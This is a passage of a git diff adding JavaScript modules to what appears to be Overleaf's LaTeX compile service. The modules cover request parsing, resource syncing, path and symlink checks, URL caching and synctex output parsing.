options, callback) { + if (callback == null) { + callback = function () {} + } + logger.debug({ projectId }, 'clearing project from cache') + return UrlCache.clearProject(projectId, options, function (error) { + if (error != null) { + logger.err({ error, projectId }, 'error clearing project from cache') + return callback(error) + } + return ProjectPersistenceManager._clearProjectFromDatabase( + projectId, + function (error) { + if (error != null) { + logger.err( + { error, projectId }, + 'error clearing project from database' + ) + } + return callback(error) + } + ) + }) + }, + + _clearProjectFromDatabase(projectId, callback) { + LAST_ACCESS.delete(projectId) + callback() + }, + + _findExpiredProjectIds(callback) { + const expiredFrom = Date.now() - ProjectPersistenceManager.EXPIRY_TIMEOUT + const expiredProjectsIds = [] + for (const [projectId, lastAccess] of LAST_ACCESS.entries()) { + if (lastAccess < expiredFrom) { + expiredProjectsIds.push(projectId) + } + } + // ^ may be a fairly busy loop, continue detached. + setTimeout(() => callback(null, expiredProjectsIds), 0) + }, +} + +logger.debug( + { EXPIRY_TIMEOUT: ProjectPersistenceManager.EXPIRY_TIMEOUT }, + 'project assets kept timeout' +) diff --git a/services/clsi/app/js/RequestParser.js b/services/clsi/app/js/RequestParser.js new file mode 100644 index 0000000..4e9d722 --- /dev/null +++ b/services/clsi/app/js/RequestParser.js @@ -0,0 +1,250 @@ +const settings = require('@overleaf/settings') +const OutputCacheManager = require('./OutputCacheManager') + +const VALID_COMPILERS = ['pdflatex', 'latex', 'xelatex', 'lualatex'] +const MAX_TIMEOUT = 600 +const EDITOR_ID_REGEX = /^[a-f0-9-]{36}$/ // UUID + +function parse(body, callback) { + const response = {} + + if (body.compile == null) { + return callback( + new Error('top level object should have a compile attribute') + ) + } + + const { compile } = body + if (!compile.options) { + compile.options = {} + } + + try { + response.metricsOpts = { + path: _parseAttribute('metricsPath', compile.options.metricsPath, { + default: '', + type: 'string', + }), + method: _parseAttribute('metricsMethod', compile.options.metricsMethod, { + default: '', + type: 'string', + }), + // Will be populated later. Must always be populated for prom library. + compile: 'initial', + } + response.compiler = _parseAttribute('compiler', compile.options.compiler, { + validValues: VALID_COMPILERS, + default: 'pdflatex', + type: 'string', + }) + response.compileFromClsiCache = _parseAttribute( + 'compileFromClsiCache', + compile.options.compileFromClsiCache, + { default: false, type: 'boolean' } + ) + response.populateClsiCache = _parseAttribute( + 'populateClsiCache', + compile.options.populateClsiCache, + { default: false, type: 'boolean' } + ) + response.enablePdfCaching = _parseAttribute( + 'enablePdfCaching', + compile.options.enablePdfCaching, + { + default: false, + type: 'boolean', + } + ) + response.pdfCachingMinChunkSize = _parseAttribute( + 'pdfCachingMinChunkSize', + compile.options.pdfCachingMinChunkSize, + { + default: settings.pdfCachingMinChunkSize, + type: 'number', + } + ) + response.timeout = _parseAttribute('timeout', compile.options.timeout, { + default: MAX_TIMEOUT, + type: 'number', + }) + response.imageName = _parseAttribute( + 'imageName', + compile.options.imageName, + { + type: 'string', + validValues: + settings.clsi && + settings.clsi.docker && + settings.clsi.docker.allowedImages, + } + ) + response.draft = _parseAttribute('draft', compile.options.draft, { + default: false, + type: 'boolean', + }) + response.stopOnFirstError = _parseAttribute( + 'stopOnFirstError', + compile.options.stopOnFirstError, + { + default: false, + type: 'boolean', + } + ) + response.check = _parseAttribute('check', compile.options.check, { + type: 'string', + }) + response.flags = _parseAttribute('flags', compile.options.flags, { + default: [], + type: 'object', + }) + if (settings.allowedCompileGroups) { + response.compileGroup = _parseAttribute( + 'compileGroup', + compile.options.compileGroup, + { + validValues: settings.allowedCompileGroups, + default: '', + type: 'string', + } + ) + } + // The syncType specifies whether the request contains all + // resources (full) or only those resources to be updated + // in-place (incremental). + response.syncType = _parseAttribute('syncType', compile.options.syncType, { + validValues: ['full', 'incremental'], + type: 'string', + }) + + // The syncState is an identifier passed in with the request + // which has the property that it changes when any resource is + // added, deleted, moved or renamed. + // + // on syncType full the syncState identifier is passed in and + // stored + // + // on syncType incremental the syncState identifier must match + // the stored value + response.syncState = _parseAttribute( + 'syncState', + compile.options.syncState, + { type: 'string' } + ) + + if (response.timeout > MAX_TIMEOUT) { + response.timeout = MAX_TIMEOUT + } + response.timeout = response.timeout * 1000 // milliseconds + + response.resources = (compile.resources || []).map(resource => + _parseResource(resource) + ) + + const rootResourcePath = _parseAttribute( + 'rootResourcePath', + compile.rootResourcePath, + { + default: 'main.tex', + type: 'string', + } + ) + response.rootResourcePath = _checkPath(rootResourcePath) + + response.editorId = _parseAttribute('editorId', compile.options.editorId, { + type: 'string', + regex: EDITOR_ID_REGEX, + }) + response.buildId = _parseAttribute('buildId', compile.options.buildId, { + type: 'string', + regex: OutputCacheManager.BUILD_REGEX, + }) + } catch (error1) { + const error = error1 + return callback(error) + } + + callback(null, response) +} + +function _parseResource(resource) { + let modified + if (resource.path == null || typeof resource.path !== 'string') { + throw new Error('all resources should have a path attribute') + } + + if (resource.modified != null) { + modified = new Date(resource.modified) + if (isNaN(modified.getTime())) { + throw new Error( + `resource modified date could not be understood: ${resource.modified}` + ) + } + } + + if (resource.url == null && resource.content == null) { + throw new Error( + 'all resources should have either a url or content attribute' + ) + } + if (resource.content != null && typeof resource.content !== 'string') { + throw new Error('content attribute should be a string') + } + if (resource.url != null && typeof resource.url !== 'string') { + throw new Error('url attribute should be a string') + } + if (resource.fallbackURL && typeof resource.fallbackURL !== 'string') { + throw new Error('fallbackURL attribute should be a string') + } + + return { + path: resource.path, + modified, + url: resource.url, + fallbackURL: resource.fallbackURL, + content: resource.content, + } +} + +function _parseAttribute(name, attribute, options) { + if (attribute != null) { + if (options.validValues != null) { + if (options.validValues.indexOf(attribute) === -1) { + throw new Error( + `${name} attribute should be one of: ${options.validValues.join( + ', ' + )}` + ) + } + } + if (options.type != null) { + // eslint-disable-next-line valid-typeof + if (typeof attribute !== options.type) { + throw new Error(`${name} attribute should be a ${options.type}`) + } + } + if (options.type === 'string' && options.regex instanceof RegExp) { + if (!options.regex.test(attribute)) { + throw new Error( + `${name} attribute does not match regex ${options.regex}` + ) + } + } + } else { + if (options.default != null) { + return options.default + } + } + return attribute +} + +function _checkPath(path) { + // check that the request does not use a relative path + for (const dir of Array.from(path.split('/'))) { + if (dir === '..') { + throw new Error('relative path in root resource') + } + } + return path +} + +module.exports = { parse, MAX_TIMEOUT } diff --git a/services/clsi/app/js/ResourceStateManager.js b/services/clsi/app/js/ResourceStateManager.js new file mode 100644 index 0000000..a5f747e --- /dev/null +++ b/services/clsi/app/js/ResourceStateManager.js @@ -0,0 +1,116 @@ +const Path = require('node:path') +const fs = require('node:fs') +const logger = require('@overleaf/logger') +const Errors = require('./Errors') +const SafeReader = require('./SafeReader') + +module.exports = { + // The sync state is an identifier which must match for an + // incremental update to be allowed. + // + // The initial value is passed in and stored on a full + // compile, along with the list of resources.. + // + // Subsequent incremental compiles must come with the same value - if + // not they will be rejected with a 409 Conflict response. The + // previous list of resources is returned. + // + // An incremental compile can only update existing files with new + // content. The sync state identifier must change if any docs or + // files are moved, added, deleted or renamed. + + SYNC_STATE_FILE: '.project-sync-state', + SYNC_STATE_MAX_SIZE: 128 * 1024, + + saveProjectState(state, resources, basePath, callback) { + const stateFile = Path.join(basePath, this.SYNC_STATE_FILE) + if (state == null) { + // remove the file if no state passed in + logger.debug({ state, basePath }, 'clearing sync state') + fs.unlink(stateFile, function (err) { + if (err && err.code !== 'ENOENT') { + return callback(err) + } else { + return callback() + } + }) + } else { + logger.debug({ state, basePath }, 'writing sync state') + const resourceList = resources.map(resource => resource.path) + fs.writeFile( + stateFile, + [...resourceList, `stateHash:${state}`].join('\n'), + callback + ) + } + }, + + checkProjectStateMatches(state, basePath, callback) { + const stateFile = Path.join(basePath, this.SYNC_STATE_FILE) + const size = this.SYNC_STATE_MAX_SIZE + SafeReader.readFile( + stateFile, + size, + 'utf8', + function (err, result, bytesRead) { + if (err) { + return callback(err) + } + if (bytesRead === size) { + logger.error( + { file: stateFile, size, bytesRead }, + 'project state file truncated' + ) + } + const array = result ? result.toString().split('\n') : [] + const adjustedLength = Math.max(array.length, 1) + const resourceList = array.slice(0, adjustedLength - 1) + const oldState = array[adjustedLength - 1] + const newState = `stateHash:${state}` + logger.debug( + { state, oldState, basePath, stateMatches: newState === oldState }, + 'checking sync state' + ) + if (newState !== oldState) { + return callback( + new Errors.FilesOutOfSyncError( + 'invalid state for incremental update' + ) + ) + } else { + const resources = resourceList.map(path => ({ path })) + callback(null, resources) + } + } + ) + }, + + checkResourceFiles(resources, allFiles, basePath, callback) { + // check the paths are all relative to current directory + const containsRelativePath = resource => { + const dirs = resource.path.split('/') + return dirs.indexOf('..') !== -1 + } + if (resources.some(containsRelativePath)) { + return callback(new Error('relative path in resource file list')) + } + // check if any of the input files are not present in list of files + const seenFiles = new Set(allFiles) + const missingFiles = resources + .map(resource => resource.path) + .filter(path => !seenFiles.has(path)) + if (missingFiles.length > 0) { + logger.err( + { missingFiles, basePath, allFiles, resources }, + 'missing input files for project' + ) + return callback( + new Errors.FilesOutOfSyncError( + 'resource files missing in incremental update' + ) + ) + } else { + callback() + } + }, +} diff --git a/services/clsi/app/js/ResourceWriter.js b/services/clsi/app/js/ResourceWriter.js new file mode 100644 index 0000000..bf88538 --- /dev/null +++ b/services/clsi/app/js/ResourceWriter.js @@ -0,0 +1,384 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, + no-useless-escape, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let ResourceWriter +const { promisify } = require('node:util') +const UrlCache = require('./UrlCache') +const Path = require('node:path') +const fs = require('node:fs') +const async = require('async') +const OutputFileFinder = require('./OutputFileFinder') +const ResourceStateManager = require('./ResourceStateManager') +const Metrics = require('./Metrics') +const logger = require('@overleaf/logger') +const settings = require('@overleaf/settings') + +const parallelFileDownloads = settings.parallelFileDownloads || 1 + +module.exports = ResourceWriter = { + syncResourcesToDisk(request, basePath, callback) { + if (callback == null) { + callback = function () {} + } + if (request.syncType === 'incremental') { + logger.debug( + { projectId: request.project_id, userId: request.user_id }, + 'incremental sync' + ) + return ResourceStateManager.checkProjectStateMatches( + request.syncState, + basePath, + function (error, resourceList) { + if (error != null) { + return callback(error) + } + return ResourceWriter._removeExtraneousFiles( + request, + resourceList, + basePath, + function (error, outputFiles, allFiles) { + if (error != null) { + return callback(error) + } + return ResourceStateManager.checkResourceFiles( + resourceList, + allFiles, + basePath, + function (error) { + if (error != null) { + return callback(error) + } + return ResourceWriter.saveIncrementalResourcesToDisk( + request.project_id, + request.resources, + basePath, + function (error) { + if (error != null) { + return callback(error) + } + return callback(null, resourceList) + } + ) + } + ) + } + ) + } + ) + } + logger.debug( + { projectId: request.project_id, userId: request.user_id }, + 'full sync' + ) + UrlCache.createProjectDir(request.project_id, error => { + if (error != null) { + return callback(error) + } + ResourceWriter.saveAllResourcesToDisk( + request, + basePath, + function (error) { + if (error != null) { + return callback(error) + } + return ResourceStateManager.saveProjectState( + request.syncState, + request.resources, + basePath, + function (error) { + if (error != null) { + return callback(error) + } + return callback(null, request.resources) + } + ) + } + ) + }) + }, + + saveIncrementalResourcesToDisk(projectId, resources, basePath, callback) { + if (callback == null) { + callback = function () {} + } + return ResourceWriter._createDirectory(basePath, error => { + if (error != null) { + return callback(error) + } + const jobs = Array.from(resources).map(resource => + (resource => { + return callback => + ResourceWriter._writeResourceToDisk( + projectId, + resource, + basePath, + callback + ) + })(resource) + ) + return async.parallelLimit(jobs, parallelFileDownloads, callback) + }) + }, + + saveAllResourcesToDisk(request, basePath, callback) { + if (callback == null) { + callback = function () {} + } + return ResourceWriter._createDirectory(basePath, error => { + if (error != null) { + return callback(error) + } + const { project_id: projectId, resources } = request + ResourceWriter._removeExtraneousFiles( + request, + resources, + basePath, + error => { + if (error != null) { + return callback(error) + } + const jobs = Array.from(resources).map(resource => + (resource => { + return callback => + ResourceWriter._writeResourceToDisk( + projectId, + resource, + basePath, + callback + ) + })(resource) + ) + return async.parallelLimit(jobs, parallelFileDownloads, callback) + } + ) + }) + }, + + _createDirectory(basePath, callback) { + if (callback == null) { + callback = function () {} + } + return fs.mkdir(basePath, function (err) { + if (err != null) { + if (err.code === 'EEXIST') { + return callback() + } else { + logger.debug({ err, dir: basePath }, 'error creating directory') + return callback(err) + } + } else { + return callback() + } + }) + }, + + _removeExtraneousFiles(request, resources, basePath, _callback) { + if (_callback == null) { + _callback = function () {} + } + const timer = new Metrics.Timer( + 'unlink-output-files', + 1, + request.metricsOpts + ) + const callback = function (error, ...result) { + timer.done() + return _callback(error, ...Array.from(result)) + } + + return OutputFileFinder.findOutputFiles( + resources, + basePath, + (error, outputFiles, allFiles) => { + if (error != null) { + return callback(error) + } + + const jobs = [] + for (const { path } of outputFiles || []) { + const shouldDelete = ResourceWriter.isExtraneousFile(path) + if (shouldDelete) { + jobs.push(callback => + ResourceWriter._deleteFileIfNotDirectory( + Path.join(basePath, path), + callback + ) + ) + } + } + + return async.series(jobs, function (error) { + if (error != null) { + return callback(error) + } + return callback(null, outputFiles, allFiles) + }) + } + ) + }, + + isExtraneousFile(path) { + let shouldDelete = true + if ( + path.match(/^output\./) || + path.match(/\.aux$/) || + path.match(/^cache\//) + ) { + // knitr cache + shouldDelete = false + } + if (path.match(/^output-.*/)) { + // Tikz cached figures (default case) + shouldDelete = false + } + if (path.match(/\.(pdf|dpth|md5)$/)) { + // Tikz cached figures (by extension) + shouldDelete = false + } + if ( + path.match(/\.(pygtex|pygstyle)$/) || + path.match(/(^|\/)_minted-[^\/]+\//) + ) { + // minted files/directory + shouldDelete = false + } + if (path.match(/\.md\.tex$/) || path.match(/(^|\/)_markdown_[^\/]+\//)) { + // markdown files/directory + shouldDelete = false + } + if (path.match(/-eps-converted-to\.pdf$/)) { + // Epstopdf generated files + shouldDelete = false + } + if ( + path === 'output.tar.gz' || + path === 'output.synctex.gz' || + path === 'output.pdfxref' || + path === 'output.pdf' || + path === 'output.dvi' || + path === 'output.log' || + path === 'output.xdv' || + path === 'output.stdout' || + path === 'output.stderr' + ) { + shouldDelete = true + } + if (path === 'output.tex') { + // created by TikzManager if present in output files + shouldDelete = true + } + return shouldDelete + }, + + _deleteFileIfNotDirectory(path, callback) { + if (callback == null) { + callback = function () {} + } + return fs.stat(path, function (error, stat) { + if (error != null && error.code === 'ENOENT') { + return callback() + } else if (error != null) { + logger.err( + { err: error, path }, + 'error stating file in deleteFileIfNotDirectory' + ) + return callback(error) + } else if (stat.isFile()) { + return fs.unlink(path, function (error) { + if (error != null) { + logger.err( + { err: error, path }, + 'error removing file in deleteFileIfNotDirectory' + ) + return callback(error) + } else { + return callback() + } + }) + } else { + return callback() + } + }) + }, + + _writeResourceToDisk(projectId, resource, basePath, callback) { + if (callback == null) { + callback = function () {} + } + return ResourceWriter.checkPath( + basePath, + resource.path, + function (error, path) { + if (error != null) { + return callback(error) + } + return fs.mkdir( + Path.dirname(path), + { recursive: true }, + function (error) { + if (error != null) { + return callback(error) + } + // TODO: Don't overwrite file if it hasn't been modified + if (resource.url != null) { + return UrlCache.downloadUrlToFile( + projectId, + resource.url, + resource.fallbackURL, + path, + resource.modified, + function (err) { + if (err != null) { + logger.err( + { + err, + projectId, + path, + resourceUrl: resource.url, + modified: resource.modified, + }, + 'error downloading file for resources' + ) + Metrics.inc('download-failed') + } + return callback() + } + ) // try and continue compiling even if http resource can not be downloaded at this time + } else { + fs.writeFile(path, resource.content, callback) + } + } + ) + } + ) + }, + + checkPath(basePath, resourcePath, callback) { + const path = Path.normalize(Path.join(basePath, resourcePath)) + if (path.slice(0, basePath.length + 1) !== basePath + '/') { + return callback(new Error('resource path is outside root directory')) + } else { + return callback(null, path) + } + }, +} + +module.exports.promises = { + syncResourcesToDisk: promisify(ResourceWriter.syncResourcesToDisk), + saveIncrementalResourcesToDisk: promisify( + ResourceWriter.saveIncrementalResourcesToDisk + ), + saveAllResourcesToDisk: promisify(ResourceWriter.saveAllResourcesToDisk), + checkPath: promisify(ResourceWriter.checkPath), +} diff --git a/services/clsi/app/js/SafeReader.js b/services/clsi/app/js/SafeReader.js new file mode 100644 index 0000000..8b1b5ab --- /dev/null +++ b/services/clsi/app/js/SafeReader.js @@ -0,0 +1,62 @@ +/* eslint-disable + no-unused-vars, + n/no-deprecated-api, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let SafeReader +const fs = require('node:fs') +const logger = require('@overleaf/logger') + +module.exports = SafeReader = { + // safely read up to size bytes from a file and return result as a + // string + + readFile(file, size, encoding, callback) { + if (callback == null) { + callback = function () {} + } + return fs.open(file, 'r', function (err, fd) { + if (err != null && err.code === 'ENOENT') { + return callback() + } + if (err != null) { + return callback(err) + } + + // safely return always closing the file + const callbackWithClose = (err, ...result) => + fs.close(fd, function (err1) { + if (err != null) { + return callback(err) + } + if (err1 != null) { + return callback(err1) + } + return callback(null, ...Array.from(result)) + }) + const buff = Buffer.alloc(size) // fills with zeroes by default + return fs.read( + fd, + buff, + 0, + buff.length, + 0, + function (err, bytesRead, buffer) { + if (err != null) { + return callbackWithClose(err) + } + const result = buffer.toString(encoding, 0, bytesRead) + return callbackWithClose(null, result, bytesRead) + } + ) + }) + }, +} diff --git a/services/clsi/app/js/StaticServerForbidSymlinks.js b/services/clsi/app/js/StaticServerForbidSymlinks.js new file mode 100644 index 0000000..a5ec774 --- /dev/null +++ b/services/clsi/app/js/StaticServerForbidSymlinks.js @@ -0,0 +1,89 @@ +/* eslint-disable + no-cond-assign, + no-unused-vars, + n/no-deprecated-api, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let ForbidSymlinks +const Path = require('node:path') +const fs = require('node:fs') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') + +module.exports = ForbidSymlinks = function (staticFn, root, options) { + const expressStatic = staticFn(root, options) + const basePath = Path.resolve(root) + return function (req, res, next) { + let file, projectId, result + const path = req.url + // check that the path is of the form /project_id_or_name/path/to/file.log + if ((result = path.match(/^\/([a-zA-Z0-9_-]+)\/(.*)$/s))) { + projectId = result[1] + file = result[2] + if (path !== `/${projectId}/${file}`) { + logger.warn({ path }, 'unrecognized file request') + return res.sendStatus(404) + } + } else { + logger.warn({ path }, 'unrecognized file request') + return res.sendStatus(404) + } + // check that the file does not use a relative path + for (const dir of Array.from(file.split('/'))) { + if (dir === '..') { + logger.warn({ path }, 'attempt to use a relative path') + return res.sendStatus(404) + } + } + // check that the requested path is normalized + const requestedFsPath = `${basePath}/${projectId}/${file}` + if (requestedFsPath !== Path.normalize(requestedFsPath)) { + logger.error( + { path: requestedFsPath }, + 'requestedFsPath is not normalized' + ) + return res.sendStatus(404) + } + // check that the requested path is not a symlink + return fs.realpath(requestedFsPath, function (err, realFsPath) { + if (err != null) { + if (err.code === 'ENOENT') { + return res.sendStatus(404) + } else { + logger.error( + { + err, + requestedFsPath, + realFsPath, + path: req.params[0], + projectId: req.params.project_id, + }, + 'error checking file access' + ) + return res.sendStatus(500) + } + } else if (requestedFsPath !== realFsPath) { + logger.warn( + { + requestedFsPath, + realFsPath, + path: req.params[0], + projectId: req.params.project_id, + }, + 'trying to access a different file (symlink), aborting' + ) + return res.sendStatus(404) + } else { + return expressStatic(req, res, next) + } + }) + } +} diff --git a/services/clsi/app/js/SynctexOutputParser.js b/services/clsi/app/js/SynctexOutputParser.js new file mode 100644 index 0000000..5b2d237 --- /dev/null +++ b/services/clsi/app/js/SynctexOutputParser.js @@ -0,0 +1,113 @@ +const Path = require('node:path') + +/** + * Parse output from the `synctex view` command + */ +function parseViewOutput(output) { + return _parseOutput(output, (record, label, value) => { + switch (label) { + case 'Page': + _setIntProp(record, 'page', value) + break + case 'h': + _setFloatProp(record, 'h', value) + break + case 'v': + _setFloatProp(record, 'v', value) + break + case 'W': + _setFloatProp(record, 'width', value) + break + case 'H': + _setFloatProp(record, 'height', value) + break + } + }) +} + +/** + * Parse output from the `synctex edit` command + */ +function parseEditOutput(output, baseDir) { + return _parseOutput(output, (record, label, value) => { + switch (label) { + case 'Input': + if (Path.isAbsolute(value)) { + record.file = Path.relative(baseDir, value) + } else { + record.file = value + } + break + case 'Line': + _setIntProp(record, 'line', value) + break + case 'Column': + _setIntProp(record, 'column', value) + break + } + }) +} + +/** + * Generic parser for synctex output + * + * Parses the output into records. Each line is split into a label and a value, + * which are then sent to `processLine` for further processing. + */ +function _parseOutput(output, processLine) { + const lines = output.split('\n') + let currentRecord = null + const records = [] + for (const line of lines) { + const [label, value] = _splitLine(line) + + // A line that starts with 'Output:' indicates a new record + if (label === 'Output') { + // Start new record + currentRecord = {} + records.push(currentRecord) + continue + } + + // Ignore the line if we're not in a record yet + if (currentRecord == null) { + continue + } + + // Process the line + processLine(currentRecord, label, value) + } + return records +} + +/** + * Split a line in label and value components. + * + * The components are separated by a colon. Note that this is slightly + * different from `line.split(':', 2)`. This version puts the entirety of the + * line after the colon in the value component, even if there are more colons + * on the line. + */ +function _splitLine(line) { + const splitIndex = line.indexOf(':') + if (splitIndex === -1) { + return ['', line] + } + return [line.slice(0, splitIndex).trim(), line.slice(splitIndex + 1).trim()] +} + +function _setIntProp(record, prop, value) { + const intValue = parseInt(value, 10) + if (!isNaN(intValue)) { + record[prop] = intValue + } +} + +function _setFloatProp(record, prop, value) { + const floatValue = parseFloat(value) + if (!isNaN(floatValue)) { + record[prop] = floatValue + } +} + +module.exports = { parseViewOutput, parseEditOutput } diff --git a/services/clsi/app/js/TikzManager.js b/services/clsi/app/js/TikzManager.js new file mode 100644 index 0000000..ca9db6b --- /dev/null +++ b/services/clsi/app/js/TikzManager.js @@ -0,0 +1,109 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let TikzManager +const fs = require('node:fs') +const Path = require('node:path') +const { promisify } = require('node:util') +const ResourceWriter = require('./ResourceWriter') +const SafeReader = require('./SafeReader') +const logger = require('@overleaf/logger') + +// for \tikzexternalize or pstool to work the main file needs to match the +// jobname. Since we set the -jobname to output, we have to create a +// copy of the main file as 'output.tex'. + +module.exports = TikzManager = { + checkMainFile(compileDir, mainFile, resources, callback) { + // if there's already an output.tex file, we don't want to touch it + if (callback == null) { + callback = function () {} + } + for (const resource of Array.from(resources)) { + if (resource.path === 'output.tex') { + logger.debug( + { compileDir, mainFile }, + 'output.tex already in resources' + ) + return callback(null, false) + } + } + // if there's no output.tex, see if we are using tikz/pgf or pstool in the main file + return ResourceWriter.checkPath( + compileDir, + mainFile, + function (error, path) { + if (error != null) { + return callback(error) + } + return SafeReader.readFile( + path, + 65536, + 'utf8', + function (error, content) { + if (error != null) { + return callback(error) + } + const usesTikzExternalize = + (content != null + ? content.indexOf('\\tikzexternalize') + : undefined) >= 0 + const usesPsTool = + (content != null ? content.indexOf('{pstool}') : undefined) >= 0 + logger.debug( + { compileDir, mainFile, usesTikzExternalize, usesPsTool }, + 'checked for packages needing main file as output.tex' + ) + const needsMainFile = usesTikzExternalize || usesPsTool + return callback(null, needsMainFile) + } + ) + } + ) + }, + + injectOutputFile(compileDir, mainFile, callback) { + if (callback == null) { + callback = function () {} + } + return ResourceWriter.checkPath( + compileDir, + mainFile, + function (error, path) { + if (error != null) { + return callback(error) + } + return fs.readFile(path, 'utf8', function (error, content) { + if (error != null) { + return callback(error) + } + logger.debug( + { compileDir, mainFile }, + 'copied file to output.tex as project uses packages which require it' + ) + // use wx flag to ensure that output file does not already exist + return fs.writeFile( + Path.join(compileDir, 'output.tex'), + content, + { flag: 'wx' }, + callback + ) + }) + } + ) + }, +} + +module.exports.promises = { + checkMainFile: promisify(TikzManager.checkMainFile), + injectOutputFile: promisify(TikzManager.injectOutputFile), +} diff --git a/services/clsi/app/js/UrlCache.js b/services/clsi/app/js/UrlCache.js new file mode 100644 index 0000000..36703e7 --- /dev/null +++ b/services/clsi/app/js/UrlCache.js @@ -0,0 +1,132 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const UrlFetcher = require('./UrlFetcher') +const Settings = require('@overleaf/settings') +const fs = require('node:fs') +const Path = require('node:path') +const { callbackify } = require('node:util') +const Metrics = require('./Metrics') + +const PENDING_DOWNLOADS = new Map() + +function getProjectDir(projectId) { + return Path.join(Settings.path.clsiCacheDir, projectId) +} + +function getCachePath(projectId, url, lastModified) { + // The url is a filestore URL. + // It is sufficient to look at the path and mtime for uniqueness. + const mtime = (lastModified && lastModified.getTime()) || 0 + const key = new URL(url).pathname.replace(/\//g, '-') + '-' + mtime + return Path.join(getProjectDir(projectId), key) +} + +async function clearProject(projectId, options) { + const timer = new Metrics.Timer('url_cache', { + status: options?.reason || 'unknown', + path: 'delete', + }) + await fs.promises.rm(getProjectDir(projectId), { + force: true, + recursive: true, + }) + timer.done() +} + +async function createProjectDir(projectId) { + await fs.promises.mkdir(getProjectDir(projectId), { recursive: true }) +} + +async function downloadUrlToFile( + projectId, + url, + fallbackURL, + destPath, + lastModified +) { + const cachePath = getCachePath(projectId, url, lastModified) + try { + const timer = new Metrics.Timer('url_cache', { + status: 'cache-hit', + path: 'copy', + }) + try { + await fs.promises.copyFile(cachePath, destPath) + } catch (err) { + if (err.code === 'ENOENT' && fallbackURL) { + const fallbackPath = getCachePath(projectId, fallbackURL, lastModified) + await fs.promises.copyFile(fallbackPath, destPath) + } else { + throw err + } + } + // the metric is only updated if the file is present in the cache + timer.done() + return + } catch (e) { + if (e.code !== 'ENOENT') { + throw e + } + } + // time the download + { + const timer = new Metrics.Timer('url_cache', { + status: 'cache-miss', + path: 'download', + }) + try { + await download(url, fallbackURL, cachePath) + } finally { + timer.done() + } + } + // time the file copy + { + const timer = new Metrics.Timer('url_cache', { + status: 'cache-miss', + path: 'copy', + }) + await fs.promises.copyFile(cachePath, destPath) + timer.done() + } +} + +async function download(url, fallbackURL, cachePath) { + let pending = PENDING_DOWNLOADS.get(cachePath) + if (pending) { + return pending + } + + pending = UrlFetcher.promises.pipeUrlToFileWithRetry( + url, + fallbackURL, + cachePath + ) + PENDING_DOWNLOADS.set(cachePath, pending) + try { + await pending + } finally { + PENDING_DOWNLOADS.delete(cachePath) + } +} + +module.exports = { + clearProject: callbackify(clearProject), + createProjectDir: callbackify(createProjectDir), + downloadUrlToFile: callbackify(downloadUrlToFile), + promises: { + clearProject, + createProjectDir, + downloadUrlToFile, + }, +} diff --git a/services/clsi/app/js/UrlFetcher.js b/services/clsi/app/js/UrlFetcher.js new file mode 100644 index 0000000..2c44f3a --- /dev/null +++ b/services/clsi/app/js/UrlFetcher.js @@ -0,0 +1,122 @@ +const fs = require('node:fs') +const logger = require('@overleaf/logger') +const Settings = require('@overleaf/settings') +const { + CustomHttpAgent, + CustomHttpsAgent, + fetchStream, + RequestFailedError, +} = require('@overleaf/fetch-utils') +const { URL } = require('node:url') +const { pipeline } = require('node:stream/promises') +const Metrics = require('./Metrics') + +const MAX_CONNECT_TIME = 1000 +const httpAgent = new CustomHttpAgent({ connectTimeout: MAX_CONNECT_TIME }) +const httpsAgent = new CustomHttpsAgent({ connectTimeout: MAX_CONNECT_TIME }) + +async function pipeUrlToFileWithRetry(url, fallbackURL, filePath) { + let remainingAttempts = 3 + let lastErr + while (remainingAttempts-- > 0) { + const timer = new Metrics.Timer('url_fetcher', { + path: lastErr ? ' retry' : 'fetch', + }) + try { + await pipeUrlToFile(url, fallbackURL, filePath) + timer.done({ status: 'success' }) + return + } catch (err) { + timer.done({ status: 'error' }) + logger.warn( + { err, url, filePath, remainingAttempts }, + 'error downloading url' + ) + lastErr = err + } + } + throw lastErr +} + +async function pipeUrlToFile(url, fallbackURL, filePath) { + const u = new URL(url) + if ( + Settings.filestoreDomainOveride && + u.host !== Settings.apis.clsiPerf.host + ) { + url = `${Settings.filestoreDomainOveride}${u.pathname}${u.search}` + } + if (fallbackURL) { + const u2 = new URL(fallbackURL) + if ( + Settings.filestoreDomainOveride && + u2.host !== Settings.apis.clsiPerf.host + ) { + fallbackURL = `${Settings.filestoreDomainOveride}${u2.pathname}${u2.search}` + } + } + + let stream + try { + stream = await fetchStream(url, { + signal: AbortSignal.timeout(60 * 1000), + // provide a function to get the agent for each request + // as there may be multiple requests with different protocols + // due to redirects. + agent: _url => (_url.protocol === 'https:' ? httpsAgent : httpAgent), + }) + } catch (err) { + if ( + fallbackURL && + err instanceof RequestFailedError && + err.response.status === 404 + ) { + stream = await fetchStream(fallbackURL, { + signal: AbortSignal.timeout(60 * 1000), + // provide a function to get the agent for each request + // as there may be multiple requests with different protocols + // due to redirects. + agent: _url => (_url.protocol === 'https:' ? httpsAgent : 